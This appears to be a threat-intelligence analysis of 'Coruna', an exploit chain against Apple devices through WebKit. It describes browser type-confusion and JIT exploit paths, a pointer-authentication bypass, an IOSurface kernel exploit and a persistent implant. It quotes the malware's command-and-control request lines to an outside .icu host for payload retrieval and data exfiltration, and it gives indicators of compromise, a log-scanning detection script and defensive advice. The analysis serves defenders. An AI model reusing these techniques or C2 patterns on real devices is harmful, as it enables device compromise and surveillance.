Coruna is a highly advanced exploit framework designed to compromise Apple devices through vulnerabilities in the Safari/WebKit browser engine. The toolkit targets ARM64-based systems running iOS and macOS and demonstrates a complete multi-stage attack chain that moves from browser exploitation to kernel-level compromise and persistent system access.
Security researchers discovered that the framework includes multiple exploitation paths, browser-based privilege escalation techniques, and a kernel exploit capable of granting full control over the device. The architecture indicates professional-grade exploit development and long-term maintenance, suggesting the toolkit originated from a well-resourced development environment.
The attack lifecycle begins with a compromised website that loads malicious JavaScript modules from attacker-controlled infrastructure. Once the victim visits the page, the exploit chain automatically triggers without requiring interaction. The chain then executes a sequence of browser exploitation, sandbox escape, privilege escalation, and persistent malware deployment.
Background and Discovery
In early March 2026, researchers documented a previously unknown exploit toolkit that targeted iPhone models running iOS versions between 13.0 and 17.2.1. The framework was given the name Coruna, derived from an internal developer identifier discovered in debug artifacts on a delivery server.
Threat intelligence analysis revealed that the toolkit was already circulating among multiple threat actors. The exploit code appears to have been originally developed within a high-end exploit ecosystem and later distributed through exploit brokerage networks before being deployed in operational attacks.
Several campaigns used the framework for different purposes:
- Espionage campaigns targeting Ukrainian websites
- Financial fraud campaigns distributing malicious cryptocurrency and gambling sites
- Mass exploitation campaigns affecting general internet users
The evolution of the framework demonstrates how advanced cyber capabilities can migrate from specialized intelligence environments into criminal operations.
Architecture of the Exploit Framework
The recovered version of the Coruna framework consists of multiple interconnected components written primarily in obfuscated JavaScript. The toolkit is modular and designed to dynamically load the appropriate exploitation path depending on the target system.
The recovered dataset includes:
- 28 JavaScript modules
- ~700 KB of obfuscated code
- WebAssembly components
- ARM64 shellcode payloads
- Mach-O binaries
- Kernel exploitation modules
Each module registers itself within a custom loader system. Dependencies between modules are resolved at runtime, allowing the exploit chain to be assembled dynamically based on the victim’s environment.
Initial Infection Vector
Coruna uses a watering-hole attack technique. In this model, attackers compromise a legitimate website frequently visited by their intended targets. The malicious page includes a script that silently downloads the exploit framework from attacker infrastructure.
The initial stage performs several environment checks, including:
- Operating system detection (iOS or macOS)
- Browser engine identification
- Safari/WebKit version validation
- Lockdown Mode detection
Once the environment matches the required criteria, the system downloads the appropriate exploit modules.
The exploit payloads are retrieved from a remote domain hosting the malicious scripts. Each script file is named using a SHA-1-like hexadecimal identifier to obscure its purpose and evade simple signature detection.
Browser Exploitation Stage
Coruna does not rely on a single vulnerability. Instead, the framework contains multiple exploit paths that target weaknesses in the WebKit rendering engine.
Three primary browser exploitation methods were identified:
NaN-Boxing Type Confusion
One exploitation technique manipulates JavaScriptCore’s internal memory representation of JavaScript values. The engine stores different data types using a NaN-boxing scheme. By triggering a type confusion scenario, the exploit causes the engine to misinterpret pointers as numeric values.
This manipulation allows attackers to access memory structures that should normally be inaccessible.
JIT Optimization Exploit
Another path targets the Just-In-Time (JIT) compilation pipeline. The exploit abuses optimization behaviors in the JIT compiler that remove certain structure validation checks.
By manipulating object structures during compilation, attackers create conditions where memory references become corrupted, allowing unauthorized memory manipulation.
Audio/SVG Memory Corruption
A third exploit chain targets a vulnerability involving the OfflineAudioContext API combined with SVG filter processing.
This technique allows attackers to corrupt memory buffers during media processing, eventually creating an arbitrary read/write primitive within the browser process.
Post-Exploitation Chain
After achieving code execution in the browser environment, the framework continues with additional exploitation stages.
The following sequence is typically observed:
- Establish arbitrary memory read/write capability
- Escape the WebAssembly sandbox
- Bypass Pointer Authentication Codes (PAC)
- Escape the JIT execution cage
- Execute native ARM64 shellcode
- Retrieve secondary payloads from command-and-control servers
One notable technique involves temporarily modifying entries in the Global Offset Table to bypass Apple’s pointer authentication mechanism. Instead of forging PAC signatures directly, the exploit leverages legitimate system routines that automatically validate pointer authentication, effectively using the operating system to authenticate attacker-supplied addresses.
Kernel Exploitation
Once code execution is achieved in user space, the exploit downloads a kernel module containing a privilege escalation exploit.
The kernel payload is delivered as a Mach-O dynamic library designed for ARM64 devices. The file is approximately 2 MB in size and contains hundreds of functions dedicated to bypassing system security mechanisms.
The kernel exploit targets the IOSurfaceRoot subsystem, a commonly exploited component within the iOS kernel. The vulnerability allows attackers to manipulate GPU surface objects in a way that results in kernel memory corruption.
Successful exploitation provides:
- Kernel read/write access
- Sandbox escape
- Privilege escalation
- Root filesystem modification
At this stage, the attacker effectively gains complete control over the device.
Command and Control Communication
Communication between infected devices and the attacker infrastructure occurs over HTTP.
The exploit performs two types of network operations:
- Payload retrieval: GET https://b27.icu/<payload>
- Data exfiltration: POST https://b27.icu/<endpoint>
The transmitted data typically includes:
- Process information
- Browser user-agent
- Current URL
- Device configuration data
To avoid caching and detection, each request includes random query parameters.
Post-Exploitation Malware
The final stage of the attack installs a persistent malware component referred to as PlasmaLoader.
This implant establishes long-term command-and-control access and includes fallback communication mechanisms. If the primary command servers become unavailable, the malware generates alternative domains using a domain generation algorithm seeded with a predefined string.
This ensures continued attacker control even if infrastructure is disrupted.
Indicators of Compromise
Several observable indicators may reveal Coruna activity within enterprise environments.
Network Indicators
- DNS requests to unusual .icu domains
- Rapid sequential downloads of JavaScript files with long hexadecimal names
- Frequent HTTP requests with randomized parameters
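The network indicators above, together with the request pattern from the command-and-control section (hex-named script downloads from a .icu host with randomized query parameters), can be checked against web-proxy logs. The following is an added example written for this page, not tooling from the report; the log format, the indicator names, and the burst thresholds are assumptions, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed sample proxy log lines (not taken from the report): timestamp, client IP, method, URL.
SAMPLE_LOG = """\
2026-03-02T10:00:02Z 10.0.0.5 GET https://b27.icu/3f0a9c1d2e4b5a6f7c8d9e0f1a2b3c4d5e6f7a8b.js?x=817233
2026-03-02T10:00:02Z 10.0.0.5 GET https://b27.icu/9d8c7b6a5f4e3d2c1b0a9f8e7d6c5b4a3f2e1d0c.js?x=29981
2026-03-02T10:00:03Z 10.0.0.5 GET https://b27.icu/aa11bb22cc33dd44ee55ff66aa77bb88cc99dd00.js?q=5512
2026-03-02T10:00:09Z 10.0.0.5 POST https://b27.icu/report?r=44812
2026-03-02T10:05:00Z 10.0.0.7 GET https://cdn.example.test/app.js?v=1.2.3
"""

LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)$", re.MULTILINE)
HEX_JS = re.compile(r"^[0-9a-f]{32,64}\.js$", re.IGNORECASE)  # SHA-1-like script names
SUSPICIOUS_TLDS = {"icu"}  # assumed list; extend with TLDs that are rare in your environment
BURST_COUNT, BURST_WINDOW_S = 3, 10  # assumed threshold: N hex-named JS fetches within W seconds

def indicators_for(url):
    """Indicator names matched by a single request URL."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    hits = []
    if host.rsplit(".", 1)[-1] in SUSPICIOUS_TLDS:
        hits.append("suspicious-tld")
    if HEX_JS.match(u.path.rsplit("/", 1)[-1]):
        hits.append("hex-named-js")
    params = parse_qsl(u.query)
    # Heuristic: every query value is a bare integer, typical of cache-busting noise.
    if params and all(v.isdigit() for _, v in params):
        hits.append("numeric-cache-buster")
    return hits

def analyze(log_text):
    """Per-client sorted indicator list, plus a burst flag for rapid hex-named JS downloads."""
    findings, hex_times = defaultdict(set), defaultdict(list)
    for ts, client, _method, url in LINE.findall(log_text):
        hits = indicators_for(url)
        findings[client].update(hits)
        if "hex-named-js" in hits:
            hex_times[client].append(datetime.fromisoformat(ts.replace("Z", "+00:00")))
    for client, times in hex_times.items():
        times.sort()
        if any((times[i + BURST_COUNT - 1] - times[i]).total_seconds() <= BURST_WINDOW_S
               for i in range(len(times) - BURST_COUNT + 1)):
            findings[client].add("rapid-hex-js-burst")
    return {c: sorted(v) for c, v in findings.items()}

if __name__ == "__main__":
    for client, hits in analyze(SAMPLE_LOG).items():
        print(client, hits)
```

A single hit such as a numeric query value is weak on its own; the combination of a rare TLD, SHA-1-like script names and a burst of such fetches from one client is what merits triage.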
Host Indicators
- Unexpected RWX memory allocations in browser processes
- Large ArrayBuffer allocations within Safari
- Network communication originating from browser sandbox processes
Defensive Recommendations
Organizations can reduce exposure to this exploit chain by implementing several defensive measures:
- Maintain current versions of Safari and WebKit.
- Enable Lockdown Mode on high-risk devices.
- Monitor DNS queries for suspicious top-level domains.
- Implement browser isolation technologies.
- Deploy detection signatures such as YARA or Suricata rules.
- Restrict browser processes from accessing sensitive network resources.
Assessment of Sophistication
The Coruna exploit framework demonstrates an unusually high level of technical sophistication.
The framework includes:
- Modular exploit architecture
- Multiple browser exploit paths
- Custom WebAssembly primitives
- Pointer authentication bypass techniques
- Kernel privilege escalation
- Persistent malware deployment
The breadth and complexity of the exploit chain strongly suggest development by experienced exploit engineers rather than opportunistic attackers.
Conclusion
Coruna represents a complete end-to-end exploitation framework targeting Apple devices through Safari and the WebKit rendering engine. The toolkit combines browser vulnerabilities, sandbox escape mechanisms, kernel exploitation, and persistent malware installation into a unified attack chain.
The modular design and technical depth demonstrate a mature exploitation capability capable of adapting to different operating system versions and hardware platforms.
Although the vulnerabilities involved have since been patched, the techniques used within Coruna illustrate the ongoing evolution of advanced exploitation frameworks and highlight the importance of rapid patch deployment and layered defensive monitoring.
